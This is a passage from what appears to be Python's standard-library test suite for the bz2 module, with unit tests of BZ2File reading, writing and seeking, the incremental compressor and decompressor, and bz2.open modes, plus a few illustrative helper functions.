DATA = b'BZh91AY&SY.\xc8N\x18\x00\x01>_\x80\x00\x10@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe00\x01\x99\xaa\x00\xc0\x03F\x86\x8c#&\x83F\x9a\x03\x06\xa6\xd0\xa6\x93M\x0fQ\xa7\xa8\x06\x804hh\x12$\x11\xa4i4\xf14S\xd2<Q\xb5\x0fH\xd3\xd4\xdd\xd5\x87\xbb\xf8\x94\r\x8f\xafI\x12\xe1\xc9\xf8/E\x00pu\x89\x12]\xc9\xbbDL\nQ\x0e\t1\x12\xdf\xa0\xc0\x97\xac2O9\x89\x13\x94\x0e\x1c7\x0ed\x95I\x0c\xaaJ\xa4\x18L\x10\x05#\x9c\xaf\xba\xbc/\x97\x8a#C\xc8\xe1\x8cW\xf9\xe2\xd0\xd6M\xa7\x8bXa<e\x84t\xcbL\xb3\xa7\xd9\xcd\xd1\xcb\x84.\xaf\xb3\xab\xab\xad`n}\xa0lh\tE,\x8eZ\x15\x17VH>\x88\xe5\xcd9gd6\x0b\n\xe9\x9b\xd5\x8a\x99\xf7\x08.K\x8ev\xfb\xf7xw\xbb\xdf\xa1\x92\xf1\xdd|/";\xa2\xba\x9f\xd5\xb1#A\xb6\xf6\xb3o\xc9\xc5y\\\xebO\xe7\x85\x9a\xbc\xb6f8\x952\xd5\xd7"%\x89>V,\xf7\xa6z\xe2\x9f\xa3\xdf\x11\x11"\xd6E)I\xa9\x13^\xca\xf3r\xd0\x03U\x922\xf26\xec\xb6\xed\x8b\xc3U\x13\x9d\xc5\x170\xa4\xfa^\x92\xacDF\x8a\x97\xd6\x19\xfe\xdd\xb8\xbd\x1a\x9a\x19\xa3\x80ankR\x8b\xe5\xd83]\xa9\xc6\x08\x82f\xf6\xb9"6l$\xb8j@\xc0\x8a\xb0l1..\xbak\x83ls\x15\xbc\xf4\xc1\x13\xbe\xf8E\xb8\x9d\r\xa8\x9dk\x84\xd3n\xfa\xacQ\x07\xb1%y\xaav\xb4\x08\xe0z\x1b\x16\xf5\x04\xe9\xcc\xb9\x08z\x1en7.G\xfc]\xc9\x14\xe1B@\xbb!8`'
EMPTY_DATA = b'BZh9\x17rE8P\x90\x00\x00\x00\x00'
BAD_DATA = b'this is not a valid bzip2 file'
# Some tests need more than one block of uncompressed data. Since one block
# is at least 100,000 bytes, we gather some data dynamically and compress it.
# Note that this assumes that compression works correctly, so we cannot
# simply use the bigger test data for all tests.
test_size = 0
BIG_TEXT = bytearray(128*1024)
for fname in glob.glob(os.path.join(glob.escape(os.path.dirname(__file__)), '*.py')):
with open(fname, 'rb') as fh:
test_size += fh.readinto(memoryview(BIG_TEXT)[test_size:])
if test_size > 128*1024:
break
BIG_DATA = bz2.compress(BIG_TEXT, compresslevel=1)
def setUp(self):
fd, self.filename = tempfile.mkstemp()
os.close(fd)
def tearDown(self):
unlink(self.filename)
class BZ2FileTest(BaseTest):
"Test the BZ2File class."
def createTempFile(self, streams=1, suffix=b""):
with open(self.filename, "wb") as f:
f.write(self.DATA * streams)
f.write(suffix)
def testBadArgs(self):
self.assertRaises(TypeError, BZ2File, 123.456)
self.assertRaises(ValueError, BZ2File, os.devnull, "z")
self.assertRaises(ValueError, BZ2File, os.devnull, "rx")
self.assertRaises(ValueError, BZ2File, os.devnull, "rbt")
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=0)
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=10)
# compresslevel is keyword-only
self.assertRaises(TypeError, BZ2File, os.devnull, "r", 3)
def testRead(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
def testReadBadFile(self):
self.createTempFile(streams=0, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertRaises(OSError, bz2f.read)
def testReadMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testReadMonkeyMultiStream(self):
# Test BZ2File.read() on a multi-stream archive where a stream
# boundary coincides with the end of the raw read buffer.
buffer_size = _compression.BUFFER_SIZE
_compression.BUFFER_SIZE = len(self.DATA)
try:
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
finally:
_compression.BUFFER_SIZE = buffer_size
def testReadTrailingJunk(self):
self.createTempFile(suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT)
def testReadMultiStreamTrailingJunk(self):
self.createTempFile(streams=5, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testRead0(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(0), b"")
def testReadChunk10(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
text = b''
while True:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT)
def testReadChunk10MultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
text = b''
while True:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT * 5)
def testRead100(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(100), self.TEXT[:100])
def testPeek(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testReadInto(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
n = 128
b = bytearray(n)
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b, self.TEXT[:n])
n = len(self.TEXT) - n
b = bytearray(len(self.TEXT))
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b[:n], self.TEXT[-n:])
def testReadLine(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES:
self.assertEqual(bz2f.readline(), line)
def testReadLineMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES * 5:
self.assertEqual(bz2f.readline(), line)
def testReadLines(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES)
def testReadLinesMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES * 5)
def testIterator(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES)
def testIteratorMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES * 5)
def testClosedIteratorDeadlock(self):
# Issue #3309: Iteration on a closed BZ2File should release the lock.
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.close()
self.assertRaises(ValueError, next, bz2f)
# This call will deadlock if the above call failed to release the lock.
self.assertRaises(ValueError, bz2f.readlines)
def testWrite(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteChunks10(self):
with BZ2File(self.filename, "w") as bz2f:
n = 0
while True:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
bz2f.write(str)
n += 1
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteNonDefaultCompressLevel(self):
expected = bz2.compress(self.TEXT, compresslevel=5)
with BZ2File(self.filename, "w", compresslevel=5) as bz2f:
bz2f.write(self.TEXT)
with open(self.filename, "rb") as f:
self.assertEqual(f.read(), expected)
def testWriteLines(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.writelines)
bz2f.writelines(self.TEXT_LINES)
# Issue #1535500: Calling writelines() on a closed BZ2File
# should raise an exception.
self.assertRaises(ValueError, bz2f.writelines, ["a"])
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteMethodsOnReadOnlyFile(self):
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(b"abc")
with BZ2File(self.filename, "r") as bz2f:
self.assertRaises(OSError, bz2f.write, b"a")
self.assertRaises(OSError, bz2f.writelines, [b"a"])
def testAppend(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with BZ2File(self.filename, "a") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT * 2)
def testSeekForward(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekForwardAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(len(self.TEXT) + 150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwards(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def testSeekBackwardsAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
readto = len(self.TEXT) + 100
while readto > 0:
readto -= len(bz2f.read(readto))
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[100-150:] + self.TEXT)
def testSeekBackwardsFromEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150, 2)
self.assertEqual(bz2f.read(), self.TEXT[len(self.TEXT)-150:])
def testSeekBackwardsFromEndAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-1000, 2)
self.assertEqual(bz2f.read(), (self.TEXT * 2)[-1000:])
def testSeekPostEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwice(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwiceMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPreStart(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT)
def testSeekPreStartMultiStream(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT * 2)
def testFileno(self):
self.createTempFile()
with open(self.filename, 'rb') as rawf:
bz2f = BZ2File(rawf)
try:
self.assertEqual(bz2f.fileno(), rawf.fileno())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.fileno)
def testSeekable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.seekable())
bz2f.read()
self.assertTrue(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
src = BytesIO(self.DATA)
src.seekable = lambda: False
bz2f = BZ2File(src)
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
def testReadable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.readable())
bz2f.read()
self.assertTrue(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
def testWritable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertFalse(bz2f.writable())
bz2f.read()
self.assertFalse(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertTrue(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
def testOpenDel(self):
self.createTempFile()
for i in range(10000):
o = BZ2File(self.filename)
del o
def testOpenNonexistent(self):
self.assertRaises(OSError, BZ2File, "/non/existent")
def testReadlinesNoNewline(self):
# Issue #1191043: readlines() fails on a file containing no newline.
data = b'BZh91AY&SY\xd9b\x89]\x00\x00\x00\x03\x80\x04\x00\x02\x00\x0c\x00 \x00!\x9ah3M\x13<]\xc9\x14\xe1BCe\x8a%t'
with open(self.filename, "wb") as f:
f.write(data)
with BZ2File(self.filename) as bz2f:
lines = bz2f.readlines()
self.assertEqual(lines, [b'Test'])
with BZ2File(self.filename) as bz2f:
xlines = list(bz2f.readlines())
self.assertEqual(xlines, [b'Test'])
def testContextProtocol(self):
f = None
with BZ2File(self.filename, "wb") as f:
f.write(b"xxx")
f = BZ2File(self.filename, "rb")
f.close()
try:
with f:
pass
except ValueError:
pass
else:
self.fail("__enter__ on a closed file didn't raise an exception")
try:
with BZ2File(self.filename, "wb") as f:
1/0
except ZeroDivisionError:
pass
else:
self.fail("1/0 didn't raise an exception")
def testThreading(self):
# Issue #7205: Using a BZ2File from several threads shouldn't deadlock.
data = b"1" * 2**20
nthreads = 10
with BZ2File(self.filename, 'wb') as f:
def comp():
for i in range(5):
f.write(data)
threads = [threading.Thread(target=comp) for i in range(nthreads)]
with threading_helper.start_threads(threads):
pass
def testMixedIterationAndReads(self):
self.createTempFile()
linelen = len(self.TEXT_LINES[0])
halflen = linelen // 2
with BZ2File(self.filename) as bz2f:
bz2f.read(halflen)
self.assertEqual(next(bz2f), self.TEXT_LINES[0][halflen:])
self.assertEqual(bz2f.read(), self.TEXT[linelen:])
with BZ2File(self.filename) as bz2f:
bz2f.readline()
self.assertEqual(next(bz2f), self.TEXT_LINES[1])
self.assertEqual(bz2f.readline(), self.TEXT_LINES[2])
with BZ2File(self.filename) as bz2f:
bz2f.readlines()
self.assertRaises(StopIteration, next, bz2f)
self.assertEqual(bz2f.readlines(), [])
def testMultiStreamOrdering(self):
# Test the ordering of streams when reading a multi-stream archive.
data1 = b"foo" * 1000
data2 = b"bar" * 1000
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(data1)
with BZ2File(self.filename, "a") as bz2f:
bz2f.write(data2)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), data1 + data2)
def testOpenBytesFilename(self):
str_filename = self.filename
try:
bytes_filename = str_filename.encode("ascii")
except UnicodeEncodeError:
self.skipTest("Temporary file name needs to be ASCII")
with BZ2File(bytes_filename, "wb") as f:
f.write(self.DATA)
with BZ2File(bytes_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
# Sanity check that we are actually operating on the right file.
with BZ2File(str_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
def testOpenPathLikeFilename(self):
filename = pathlib.Path(self.filename)
with BZ2File(filename, "wb") as f:
f.write(self.DATA)
with BZ2File(filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
def testDecompressLimited(self):
"""Decompressed data buffering should be limited"""
bomb = bz2.compress(b'\0' * int(2e6), compresslevel=9)
self.assertLess(len(bomb), _compression.BUFFER_SIZE)
decomp = BZ2File(BytesIO(bomb))
self.assertEqual(decomp.read(1), b'\0')
max_decomp = 1 + DEFAULT_BUFFER_SIZE
self.assertLessEqual(decomp._buffer.raw.tell(), max_decomp,
"Excessive amount of data was decompressed")
# Tests for a BZ2File wrapping another file object:
def testReadBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
self.assertFalse(bio.closed)
def testPeekBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testWriteBytesIO(self):
with BytesIO() as bio:
with BZ2File(bio, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
self.assertEqual(ext_decompress(bio.getvalue()), self.TEXT)
self.assertFalse(bio.closed)
def testSeekForwardBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwardsBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def test_read_truncated(self):
# Drop the eos_magic field (6 bytes) and CRC (4 bytes).
truncated = self.DATA[:-10]
with BZ2File(BytesIO(truncated)) as f:
self.assertRaises(EOFError, f.read)
with BZ2File(BytesIO(truncated)) as f:
self.assertEqual(f.read(len(self.TEXT)), self.TEXT)
self.assertRaises(EOFError, f.read, 1)
# Incomplete 4-byte file header, and block header of at least 146 bits.
for i in range(22):
with BZ2File(BytesIO(truncated[:i])) as f:
self.assertRaises(EOFError, f.read, 1)
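# Illustrative sketch (not part of the test suite): BZ2File transparently reads
# a file made of several concatenated bz2 streams, which is the behaviour the
# *MultiStream tests above exercise. The helper below is hypothetical and is
# never invoked by test_main().
def _example_multistream_roundtrip():
    """Round-trip two independently compressed chunks through one BZ2File."""
    import bz2
    import io
    payload = bz2.compress(b"first stream\n") + bz2.compress(b"second stream\n")
    # BZ2File keeps decompressing past the end of the first stream.
    with bz2.BZ2File(io.BytesIO(payload)) as f:
        data = f.read()
    assert data == b"first stream\nsecond stream\n"
    return data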
class BZ2CompressorTest(BaseTest):
def testCompress(self):
bz2c = BZ2Compressor()
self.assertRaises(TypeError, bz2c.compress)
data = bz2c.compress(self.TEXT)
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
bz2c = BZ2Compressor()
data = bz2c.compress(b'')
data += bz2c.flush()
self.assertEqual(data, self.EMPTY_DATA)
def testCompressChunks10(self):
bz2c = BZ2Compressor()
n = 0
data = b''
while True:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
data += bz2c.compress(str)
n += 1
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
@support.skip_if_pgo_task
@bigmemtest(size=_4G + 100, memuse=2)
def testCompress4G(self, size):
# "Test BZ2Compressor.compress()/flush() with >4GiB input"
bz2c = BZ2Compressor()
data = b"x" * size
try:
compressed = bz2c.compress(data)
compressed += bz2c.flush()
finally:
data = None # Release memory
data = bz2.decompress(compressed)
try:
self.assertEqual(len(data), size)
self.assertEqual(len(data.strip(b"x")), 0)
finally:
data = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Compressor(), proto)
class BZ2DecompressorTest(BaseTest):
def test_Constructor(self):
self.assertRaises(TypeError, BZ2Decompressor, 42)
def testDecompress(self):
bz2d = BZ2Decompressor()
self.assertRaises(TypeError, bz2d.decompress)
text = bz2d.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressChunks10(self):
bz2d = BZ2Decompressor()
text = b''
n = 0
while True:
str = self.DATA[n*10:(n+1)*10]
if not str:
break
text += bz2d.decompress(str)
n += 1
self.assertEqual(text, self.TEXT)
def testDecompressUnusedData(self):
bz2d = BZ2Decompressor()
unused_data = b"this is unused data"
text = bz2d.decompress(self.DATA+unused_data)
self.assertEqual(text, self.TEXT)
self.assertEqual(bz2d.unused_data, unused_data)
def testEOFError(self):
bz2d = BZ2Decompressor()
text = bz2d.decompress(self.DATA)
self.assertRaises(EOFError, bz2d.decompress, b"anything")
self.assertRaises(EOFError, bz2d.decompress, b"")
@support.skip_if_pgo_task
@bigmemtest(size=_4G + 100, memuse=3.3)
def testDecompress4G(self, size):
# "Test BZ2Decompressor.decompress() with >4GiB input"
blocksize = 10 * 1024 * 1024
block = random.randbytes(blocksize)
try:
data = block * (size // blocksize + 1)
compressed = bz2.compress(data)
bz2d = BZ2Decompressor()
decompressed = bz2d.decompress(compressed)
self.assertTrue(decompressed == data)
finally:
data = None
compressed = None
decompressed = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Decompressor(), proto)
def testDecompressorChunksMaxsize(self):
bzd = BZ2Decompressor()
max_length = 100
out = []
# Feed some input
len_ = len(self.BIG_DATA) - 64
out.append(bzd.decompress(self.BIG_DATA[:len_],
max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data without providing more input
out.append(bzd.decompress(b'', max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data while providing more input
out.append(bzd.decompress(self.BIG_DATA[len_:],
max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
# Retrieve remaining uncompressed data
while not bzd.eof:
out.append(bzd.decompress(b'', max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
out = b"".join(out)
self.assertEqual(out, self.BIG_TEXT)
self.assertEqual(bzd.unused_data, b"")
def test_decompressor_inputbuf_1(self):
# Test reusing input buffer after moving existing
# contents to beginning
bzd = BZ2Decompressor()
out = []
# Create input buffer and fill it
self.assertEqual(bzd.decompress(self.DATA[:100],
max_length=0), b'')
# Retrieve some results, freeing capacity at beginning
# of input buffer
out.append(bzd.decompress(b'', 2))
# Add more data that fits into input buffer after
# moving existing data to beginning
out.append(bzd.decompress(self.DATA[100:105], 15))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[105:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_2(self):
# Test reusing input buffer by appending data at the
# end right away
bzd = BZ2Decompressor()
out = []
# Create input buffer and empty it
self.assertEqual(bzd.decompress(self.DATA[:200],
max_length=0), b'')
out.append(bzd.decompress(b''))
# Fill buffer with new data
out.append(bzd.decompress(self.DATA[200:280], 2))
# Append some more data, not enough to require resize
out.append(bzd.decompress(self.DATA[280:300], 2))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_3(self):
# Test reusing input buffer after extending it
bzd = BZ2Decompressor()
out = []
# Create almost full input buffer
out.append(bzd.decompress(self.DATA[:200], 5))
# Add even more data to it, requiring resize
out.append(bzd.decompress(self.DATA[200:300], 5))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_failure(self):
bzd = BZ2Decompressor()
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
# Previously, a second call could crash due to internal inconsistency
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
@support.refcount_test
def test_refleaks_in___init__(self):
gettotalrefcount = support.get_attribute(sys, 'gettotalrefcount')
bzd = BZ2Decompressor()
refs_before = gettotalrefcount()
for i in range(100):
bzd.__init__()
self.assertAlmostEqual(gettotalrefcount() - refs_before, 0, delta=10)
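# Illustrative sketch: the tests above drive BZ2Decompressor through its
# incremental interface (max_length, needs_input, eof, unused_data). The
# hypothetical helper below shows the usual feeding loop; nothing in this
# module calls it.
def _example_incremental_decompress(compressed, chunk_size=64, max_length=128):
    """Decompress `compressed` in bounded steps and return the joined output."""
    import bz2
    decomp = bz2.BZ2Decompressor()
    pieces = []
    pos = 0
    while not decomp.eof:
        if decomp.needs_input:
            if pos >= len(compressed):
                raise EOFError("compressed stream ended prematurely")
            chunk = compressed[pos:pos + chunk_size]
            pos += chunk_size
        else:
            # Input is still buffered internally; keep draining the output.
            chunk = b""
        pieces.append(decomp.decompress(chunk, max_length=max_length))
    return b"".join(pieces)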
class CompressDecompressTest(BaseTest):
def testCompress(self):
data = bz2.compress(self.TEXT)
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
text = bz2.compress(b'')
self.assertEqual(text, self.EMPTY_DATA)
def testDecompress(self):
text = bz2.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressEmpty(self):
text = bz2.decompress(b"")
self.assertEqual(text, b"")
def testDecompressToEmptyString(self):
text = bz2.decompress(self.EMPTY_DATA)
self.assertEqual(text, b'')
def testDecompressIncomplete(self):
self.assertRaises(ValueError, bz2.decompress, self.DATA[:-10])
def testDecompressBadData(self):
self.assertRaises(OSError, bz2.decompress, self.BAD_DATA)
def testDecompressMultiStream(self):
text = bz2.decompress(self.DATA * 5)
self.assertEqual(text, self.TEXT * 5)
def testDecompressTrailingJunk(self):
text = bz2.decompress(self.DATA + self.BAD_DATA)
self.assertEqual(text, self.TEXT)
def testDecompressMultiStreamTrailingJunk(self):
text = bz2.decompress(self.DATA * 5 + self.BAD_DATA)
self.assertEqual(text, self.TEXT * 5)
class OpenTest(BaseTest):
"Test the open function."
def open(self, *args, **kwargs):
return bz2.open(*args, **kwargs)
def test_binary_modes(self):
for mode in ("wb", "xb"):
if mode == "xb":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "rb") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "ab") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_implicit_binary_modes(self):
# Test implicit binary modes (no "b" or "t" in mode string).
for mode in ("w", "x"):
if mode == "x":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "a") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_text_modes(self):
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
for mode in ("wt", "xt"):
if mode == "xt":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt") as f:
self.assertEqual(f.read(), text)
with self.open(self.filename, "at") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol * 2)
def test_x_mode(self):
for mode in ("x", "xb", "xt"):
unlink(self.filename)
with self.open(self.filename, mode) as f:
pass
with self.assertRaises(FileExistsError):
with self.open(self.filename, mode) as f:
pass
def test_fileobj(self):
with self.open(BytesIO(self.DATA), "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(BytesIO(self.DATA), "rb") as f:
self.assertEqual(f.read(), self.TEXT)
text = self.TEXT.decode("ascii")
with self.open(BytesIO(self.DATA), "rt") as f:
self.assertEqual(f.read(), text)
def test_bad_params(self):
# Test invalid parameter combinations.
self.assertRaises(ValueError,
self.open, self.filename, "wbt")
self.assertRaises(ValueError,
self.open, self.filename, "xbt")
self.assertRaises(ValueError,
self.open, self.filename, "rb", encoding="utf-8")
self.assertRaises(ValueError,
self.open, self.filename, "rb", errors="ignore")
self.assertRaises(ValueError,
self.open, self.filename, "rb", newline="\n")
def test_encoding(self):
# Test non-default encoding.
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
with self.open(self.filename, "wt", encoding="utf-16-le") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("utf-16-le")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt", encoding="utf-16-le") as f:
self.assertEqual(f.read(), text)
def test_encoding_error_handler(self):
# Test with non-default encoding error handler.
with self.open(self.filename, "wb") as f:
f.write(b"foo\xffbar")
with self.open(self.filename, "rt", encoding="ascii", errors="ignore") \
as f:
self.assertEqual(f.read(), "foobar")
def test_newline(self):
# Test with explicit newline (universal newline mode disabled).
text = self.TEXT.decode("ascii")
with self.open(self.filename, "wt", newline="\n") as f:
f.write(text)
with self.open(self.filename, "rt", newline="\r") as f:
self.assertEqual(f.readlines(), [text])
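# Illustrative sketch of the bz2.open() behaviour exercised by OpenTest: text
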